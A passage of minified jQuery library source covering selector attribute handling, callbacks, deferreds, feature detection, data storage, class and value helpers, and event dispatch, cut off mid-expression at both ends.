r?t:e.getAttribute(n,"type"===n.toLowerCase()?1:2)}),r.attributes&&ut(function(e){return e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||ct("value",function(e,n,r){return r||"input"!==e.nodeName.toLowerCase()?t:e.defaultValue}),ut(function(e){return null==e.getAttribute("disabled")})||ct(B,function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&i.specified?i.value:e[n]===!0?n.toLowerCase():null}),x.find=at,x.expr=at.selectors,x.expr[":"]=x.expr.pseudos,x.unique=at.uniqueSort,x.text=at.getText,x.isXMLDoc=at.isXML,x.contains=at.contains}(e);var O={};function F(e){var t=O[e]={};return x.each(e.match(T)||[],function(e,n){t[n]=!0}),t}x.Callbacks=function(e){e="string"==typeof e?O[e]||F(e):x.extend({},e);var n,r,i,o,a,s,l=[],u=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=l.length,n=!0;l&&o>a;a++)if(l[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,l&&(u?u.length&&c(u.shift()):r?l=[]:p.disable())},p={add:function(){if(l){var t=l.length;(function i(t){x.each(t,function(t,n){var r=x.type(n);"function"===r?e.unique&&p.has(n)||l.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=l.length:r&&(s=t,c(r))}return this},remove:function(){return l&&x.each(arguments,function(e,t){var r;while((r=x.inArray(t,l,r))>-1)l.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?x.inArray(e,l)>-1:!(!l||!l.length)},empty:function(){return l=[],o=0,this},disable:function(){return l=u=r=t,this},disabled:function(){return!l},lock:function(){return u=t,r||p.disable(),this},locked:function(){return!u},fireWith:function(e,t){return!l||i&&!u||(t=t||[],t=[e,t.slice?t.slice():t],n?u.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},x.extend({Deferred:function(e){var t=[["resolve","done",x.Callbacks("once memory"),"resolved"],["reject","fail",x.Callbacks("once memory"),"rejected"],["notify","progress",x.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return x.Deferred(function(n){x.each(t,function(t,o){var a=o[0],s=x.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&x.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?x.extend(e,r):r}},i={};return r.pipe=r.then,x.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=g.call(arguments),r=n.length,i=1!==r||e&&x.isFunction(e.promise)?r:0,o=1===i?e:x.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?g.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,l,u;if(r>1)for(s=Array(r),l=Array(r),u=Array(r);r>t;t++)n[t]&&x.isFunction(n[t].promise)?n[t].promise().done(a(t,u,n)).fail(o.reject).progress(a(t,l,s)):--i;return i||o.resolveWith(u,n),o.promise()}}),x.support=function(t){var n,r,o,s,l,u,c,p,f,d=a.createElement("div");if(d.setAttribute("className","t"),d.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=d.getElementsByTagName("*")||[],r=d.getElementsByTagName("a")[0],!r||!r.style||!n.length)return t;s=a.createElement("select"),u=s.appendChild(a.createElement("option")),o=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t.getSetAttribute="t"!==d.className,t.leadingWhitespace=3===d.firstChild.nodeType,t.tbody=!d.getElementsByTagName("tbody").length,t.htmlSerialize=!!d.getElementsByTagName("link").length,t.style=/top/.test(r.getAttribute("style")),t.hrefNormalized="/a"===r.getAttribute("href"),t.opacity=/^0.5/.test(r.style.opacity),t.cssFloat=!!r.style.cssFloat,t.checkOn=!!o.value,t.optSelected=u.selected,t.enctype=!!a.createElement("form").enctype,t.html5Clone="<:nav></:nav>"!==a.createElement("nav").cloneNode(!0).outerHTML,t.inlineBlockNeedsLayout=!1,t.shrinkWrapBlocks=!1,t.pixelPosition=!1,t.deleteExpando=!0,t.noCloneEvent=!0,t.reliableMarginRight=!0,t.boxSizingReliable=!0,o.checked=!0,t.noCloneChecked=o.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!u.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}o=a.createElement("input"),o.setAttribute("value",""),t.input=""===o.getAttribute("value"),o.value="t",o.setAttribute("type","radio"),t.radioValue="t"===o.value,o.setAttribute("checked","t"),o.setAttribute("name","t"),l=a.createDocumentFragment(),l.appendChild(o),t.appendChecked=o.checked,t.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip;for(f in x(t))break;return t.ownLast="0"!==f,x(function(){var n,r,o,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",l=a.getElementsByTagName("body")[0];l&&(n=a.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",l.appendChild(n).appendChild(d),d.innerHTML="<table><tr><td></td><td>t</td></tr></table>",o=d.getElementsByTagName("td"),o[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===o[0].offsetHeight,o[0].style.display="",o[1].style.display="none",t.reliableHiddenOffsets=p&&0===o[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",x.swap(l,null!=l.style.zoom?{zoom:1}:{},function(){t.boxSizing=4===d.offsetWidth}),e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(a.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="<div></div>",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(l.style.zoom=1)),l.removeChild(n),n=d=o=r=null)}),n=s=l=u=r=o=null,t
  5. }({});var B=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;function R(e,n,r,i){if(x.acceptData(e)){var o,a,s=x.expando,l=e.nodeType,u=l?x.cache:e,c=l?e[s]:e[s]&&s;if(c&&u[c]&&(i||u[c].data)||r!==t||"string"!=typeof n)return c||(c=l?e[s]=p.pop()||x.guid++:s),u[c]||(u[c]=l?{}:{toJSON:x.noop}),("object"==typeof n||"function"==typeof n)&&(i?u[c]=x.extend(u[c],n):u[c].data=x.extend(u[c].data,n)),a=u[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[x.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=a[x.camelCase(n)])):o=a,o}}function W(e,t,n){if(x.acceptData(e)){var r,i,o=e.nodeType,a=o?x.cache:e,s=o?e[x.expando]:x.expando;if(a[s]){if(t&&(r=n?a[s]:a[s].data)){x.isArray(t)?t=t.concat(x.map(t,x.camelCase)):t in r?t=[t]:(t=x.camelCase(t),t=t in r?[t]:t.split(" ")),i=t.length;while(i--)delete r[t[i]];if(n?!I(r):!x.isEmptyObject(r))return}(n||(delete a[s].data,I(a[s])))&&(o?x.cleanData([e],!0):x.support.deleteExpando||a!=a.window?delete a[s]:a[s]=null)}}}x.extend({cache:{},noData:{applet:!0,embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(e){return e=e.nodeType?x.cache[e[x.expando]]:e[x.expando],!!e&&!I(e)},data:function(e,t,n){return R(e,t,n)},removeData:function(e,t){return W(e,t)},_data:function(e,t,n){return R(e,t,n,!0)},_removeData:function(e,t){return W(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&x.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),x.fn.extend({data:function(e,n){var r,i,o=null,a=0,s=this[0];if(e===t){if(this.length&&(o=x.data(s),1===s.nodeType&&!x._data(s,"parsedAttrs"))){for(r=s.attributes;r.length>a;a++)i=r[a].name,0===i.indexOf("data-")&&(i=x.camelCase(i.slice(5)),$(s,i,o[i]));x._data(s,"parsedAttrs",!0)}return o}return"object"==typeof e?this.each(function(){x.data(this,e)}):arguments.length>1?this.each(function(){x.data(this,e,n)}):s?$(s,e,x.data(s,e)):null},removeData:function(e){return this.each(function(){x.removeData(this,e)})}});function $(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(P,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:B.test(r)?x.parseJSON(r):r}catch(o){}x.data(e,n,r)}else r=t}return r}function I(e){var t;for(t in e)if(("data"!==t||!x.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}x.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=x._data(e,n),r&&(!i||x.isArray(r)?i=x._data(e,n,x.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=x.queue(e,t),r=n.length,i=n.shift(),o=x._queueHooks(e,t),a=function(){x.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return x._data(e,n)||x._data(e,n,{empty:x.Callbacks("once memory").add(function(){x._removeData(e,t+"queue"),x._removeData(e,n)})})}}),x.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?x.queue(this[0],e):n===t?this:this.each(function(){var t=x.queue(this,e,n);x._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&x.dequeue(this,e)})},dequeue:function(e){return this.each(function(){x.dequeue(this,e)})},delay:function(e,t){return e=x.fx?x.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=x.Deferred(),a=this,s=this.length,l=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=x._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(l));return l(),o.promise(n)}});var z,X,U=/[\t\r\n\f]/g,V=/\r/g,Y=/^(?:input|select|textarea|button|object)$/i,J=/^(?:a|area)$/i,G=/^(?:checked|selected)$/i,Q=x.support.getSetAttribute,K=x.support.input;x.fn.extend({attr:function(e,t){return x.access(this,x.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){x.removeAttr(this,e)})},prop:function(e,t){return x.access(this,x.prop,e,t,arguments.length>1)},removeProp:function(e){return e=x.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,l="string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).addClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=x.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,l=0===arguments.length||"string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).removeClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?x.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e;return"boolean"==typeof t&&"string"===n?t?this.addClass(e):this.removeClass(e):x.isFunction(e)?this.each(function(n){x(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var t,r=0,o=x(this),a=e.match(T)||[];while(t=a[r++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else(n===i||"boolean"===n)&&(this.className&&x._data(this,"__className__",this.className),this.className=this.className||e===!1?"":x._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(U," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=x.isFunction(e),this.each(function(n){var o;1===this.nodeType&&(o=i?e.call(this,n,x(this).val()):e,null==o?o="":"number"==typeof o?o+="":x.isArray(o)&&(o=x.map(o,function(e){return null==e?"":e+""})),r=x.valHooks[this.type]||x.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=x.valHooks[o.type]||x.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(V,""):null==n?"":n)}}}),x.extend({valHooks:{option:{get:function(e){var t=x.find.attr(e,"value");return null!=t?t:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,l=0>i?s:o?i:0;for(;s>l;l++)if(n=r[l],!(!n.selected&&l!==i||(x.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&x.nodeName(n.parentNode,"optgroup"))){if(t=x(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n,r,i=e.options,o=x.makeArray(t),a=i.length;while(a--)r=i[a],(r.selected=x.inArray(x(r).val(),o)>=0)&&(n=!0);return n||(e.selectedIndex=-1),o}}},attr:function(e,n,r){var o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return typeof e.getAttribute===i?x.prop(e,n,r):(1===s&&x.isXMLDoc(e)||(n=n.toLowerCase(),o=x.attrHooks[n]||(x.expr.match.bool.test(n)?X:z)),r===t?o&&"get"in o&&null!==(a=o.get(e,n))?a:(a=x.find.attr(e,n),null==a?t:a):null!==r?o&&"set"in o&&(a=o.set(e,r,n))!==t?a:(e.setAttribute(n,r+""),r):(x.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(T);if(o&&1===e.nodeType)while(n=o[i++])r=x.propFix[n]||n,x.expr.match.bool.test(n)?K&&Q||!G.test(n)?e[r]=!1:e[x.camelCase("default-"+n)]=e[r]=!1:x.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!x.support.radioValue&&"radio"===t&&x.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{"for":"htmlFor","class":"className"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!x.isXMLDoc(e),a&&(n=x.propFix[n]||n,o=x.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var t=x.find.attr(e,"tabindex");return t?parseInt(t,10):Y.test(e.nodeName)||J.test(e.nodeName)&&e.href?0:-1}}}}),X={set:function(e,t,n){return t===!1?x.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&x.propFix[n]||n,n):e[x.camelCase("default-"+n)]=e[n]=!0,n}},x.each(x.expr.match.bool.source.match(/\w+/g),function(e,n){var r=x.expr.attrHandle[n]||x.find.attr;x.expr.attrHandle[n]=K&&Q||!G.test(n)?function(e,n,i){var o=x.expr.attrHandle[n],a=i?t:(x.expr.attrHandle[n]=t)!=r(e,n,i)?n.toLowerCase():null;return x.expr.attrHandle[n]=o,a}:function(e,n,r){return r?t:e[x.camelCase("default-"+n)]?n.toLowerCase():null}}),K&&Q||(x.attrHooks.value={set:function(e,n,r){return x.nodeName(e,"input")?(e.defaultValue=n,t):z&&z.set(e,n,r)}}),Q||(z={set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},x.expr.attrHandle.id=x.expr.attrHandle.name=x.expr.attrHandle.coords=function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&""!==i.value?i.value:null},x.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&r.specified?r.value:t},set:z.set},x.attrHooks.contenteditable={set:function(e,t,n){z.set(e,""===t?!1:t,n)}},x.each(["width","height"],function(e,n){x.attrHooks[n]={set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}}})),x.support.hrefNormalized||x.each(["href","src"],function(e,t){x.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}}),x.support.style||(x.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),x.support.optSelected||(x.propHooks.selected={get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}}),x.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){x.propFix[this.toLowerCase()]=this}),x.support.enctype||(x.propFix.enctype="encoding"),x.each(["radio","checkbox"],function(){x.valHooks[this]={set:function(e,n){return x.isArray(n)?e.checked=x.inArray(x(e).val(),n)>=0:t}},x.support.checkOn||(x.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}function at(){try{return a.activeElement}catch(e){}}x.event={global:{},add:function(e,n,r,o,a){var s,l,u,c,p,f,d,h,g,m,y,v=x._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=x.guid++),(l=v.events)||(l=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof x===i||e&&x.event.triggered===e.type?t:x.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(T)||[""],u=n.length;while(u--)s=rt.exec(n[u])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),g&&(p=x.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=x.event.special[g]||{},d=x.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&x.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=l[g])||(h=l[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),x.event.global[g]=!0);e=null}},remove:function(e,t,n,r,i){var o,a,s,l,u,c,p,f,d,h,g,m=x.hasData(e)&&x._data(e);if(m&&(c=m.events)){t=(t||"").match(T)||[""],u=t.length;while(u--)if(s=rt.exec(t[u])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=x.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),l=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));l&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||x.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)x.event.remove(e,d+t[u],n,r,!0);x.isEmptyObject(c)&&(delete m.handle,x._removeData(e,"events"))}},trigger:function(n,r,i,o){var s,l,u,c,p,f,d,h=[i||a],g=v.call(n,"type")?n.type:n,m=v.call(n,"namespace")?n.namespace.split("."):[];if(u=f=i=i||a,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+x.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),l=0>g.indexOf(":")&&"on"+g,n=n[x.expando]?n:new x.Event(g,"object"==typeof n&&n),n.isTrigger=o?2:3,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:x.makeArray(r,[n]),p=x.event.special[g]||{},o||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!o&&!p.noBubble&&!x.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(u=u.parentNode);u;u=u.parentNode)h.push(u),f=u;f===(i.ownerDocument||a)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((u=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(x._data(u,"events")||{})[n.type]&&x._data(u,"handle"),s&&s.apply(u,r),s=l&&u[l],s&&x.acceptData(u)&&s.apply&&s.apply(u,r)===!1&&n.preventDefault();if(n.type=g,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(h.pop(),r)===!1)&&x.acceptData(i)&&l&&i[g]&&!x.isWindow(i)){f=i[l],f&&(i[l]=null),x.event.triggered=g;try{i[g]()}catch(y){}x.event.triggered=t,f&&(i[l]=f)}return n.result}},dispatch:function(e){e=x.event.fix(e);var n,r,i,o,a,s=[],l=g.call(arguments),u=(x._data(this,"events")||{})[e.type]||[],c=x.event.special[e.type]||{};if(l[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=x.event.handlers.call(this,e,u),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((x.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,l),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],l=n.delegateCount,u=e.target;if(l&&u.nodeType&&(!e.button||"click"!==e.type))for(;u!=this;u=u.parentNode||this)if(1===u.nodeType&&(u.disabled!==!0||"click"!==e.type)){for(o=[],a=0;l>a;a++)i=n[a],r=i.selector+" ",o[r]===t&&(o[r]=i.needsContext?x(r,this).index(u)>=0:x.find(r,this,null,[u]).length),o[r]&&o.push(i);o.length&&s.push({elem:u,handlers:o})}return n.length>l&&s.push({elem:this,handlers:n.slice(l)}),s},fix:function(e){if(e[x.expando])return e;var t,n,r,i=e.type,o=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new x.Event(o),t=r.length;while(t--)n=r[t],e[n]=o[n];return e.target||(e.target=o.srcElement||a),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,o):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,o,s=n.button,l=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||a,o=i.documentElement,r=i.body,e.pageX=n.clientX+(o&&o.scrollLeft||r&&r.scrollLeft||0)-(o&&o.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(o&&o.scrollTop||r&&r.scrollTop||0)-(o&&o.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&l&&(e.relatedTarget=l===e.target?n.toElement:l),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==at()&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===at()&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},click:{trigger:function(){return x.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t},_default:function(e){return x.nodeName(e.target,"a")}},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=x.extend(new x.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?x.event.trigger(i,null,t):x.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},x.removeEvent=a.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},x.Event=function(e,n){return this instanceof x.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&x.extend(this,n),this.timeStamp=e&&e.timeStamp||x.now(),this[x.expando]=!0,t):new x.Event(e,n)},x.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},x.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){x.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!x.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),x.support.submitBubbles||(x.event.special.submit={setup:function(){return x.nodeName(this,"form")?!1:(x.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=x.nodeName(n,"input")||x.nodeName(n,"button")?n.form:t;r&&!x._data(r,"submitBubbles")&&(x.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),x._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&x.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return x.nodeName(this,"form")?!1:(x.event.remove(this,"._submit"),t)}}),x.support.changeBubbles||(x.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(x.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),x.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),x.event.simulate("change",this,e,!0)})),!1):(x.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!x._data(t,"changeBubbles")&&(x.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||x.event.simulate("change",this.parentNode,e,!0)}),x._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return x.event.remove(this,"._change"),!Z.test(this.nodeName)}}),x.support.focusinBubbles||x.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){x.event.simulate(t,e.target,x.event.fix(e),!0)};x.event.special[t]={setup:function(){0===n++&&a.addEventListener(e,r,!0)},teardown:function(){0===--n&&a.removeEventListener(e,r,!0)}}}),x.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return 